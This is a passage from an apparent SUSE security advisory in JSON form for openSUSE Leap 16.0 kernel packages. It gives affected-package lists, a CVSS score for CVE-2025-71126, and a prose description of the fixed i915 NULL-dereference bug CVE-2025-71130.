"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71126"
},
{
"cve": "CVE-2025-71130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71130"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer\n\nInitialize the eb.vma array with values of 0 when the eb structure is\nfirst set up. In particular, this sets the eb-\u003evma[i].vma pointers to\nNULL, simplifying cleanup and getting rid of the bug described below.\n\nDuring the execution of eb_lookup_vmas(), the eb-\u003evma array is\nsuccessively filled up with struct eb_vma objects. This process includes\ncalling eb_add_vma(), which might fail; however, even in the event of\nfailure, eb-\u003evma[i].vma is set for the currently processed buffer.\n\nIf eb_add_vma() fails, eb_lookup_vmas() returns with an error, which\nprompts a call to eb_release_vmas() to clean up the mess. Since\neb_lookup_vmas() might fail during processing any (possibly not first)\nbuffer, eb_release_vmas() checks whether a buffer\u0027s vma is NULL to know\nat what point did the lookup function fail.\n\nIn eb_lookup_vmas(), eb-\u003evma[i].vma is set to NULL if either the helper\nfunction eb_lookup_vma() or eb_validate_vma() fails. eb-\u003evma[i+1].vma is\nset to NULL in case i915_gem_object_userptr_submit_init() fails; the\ncurrent one needs to be cleaned up by eb_release_vmas() at this point,\nso the next one is set. If eb_add_vma() fails, neither the current nor\nthe next vma is set to NULL, which is a source of a NULL deref bug\ndescribed in the issue linked in the Closes tag.\n\nWhen entering eb_lookup_vmas(), the vma pointers are set to the slab\npoison value, instead of NULL. This doesn\u0027t matter for the actual\nlookup, since it gets overwritten anyway, however the eb_release_vmas()\nfunction only recognizes NULL as the stopping value, hence the pointers\nare being set to NULL as they go in case of intermediate failure. This\npatch changes the approach to filling them all with NULL at the start\ninstead, rather than handling that manually during failure.\n\n(cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
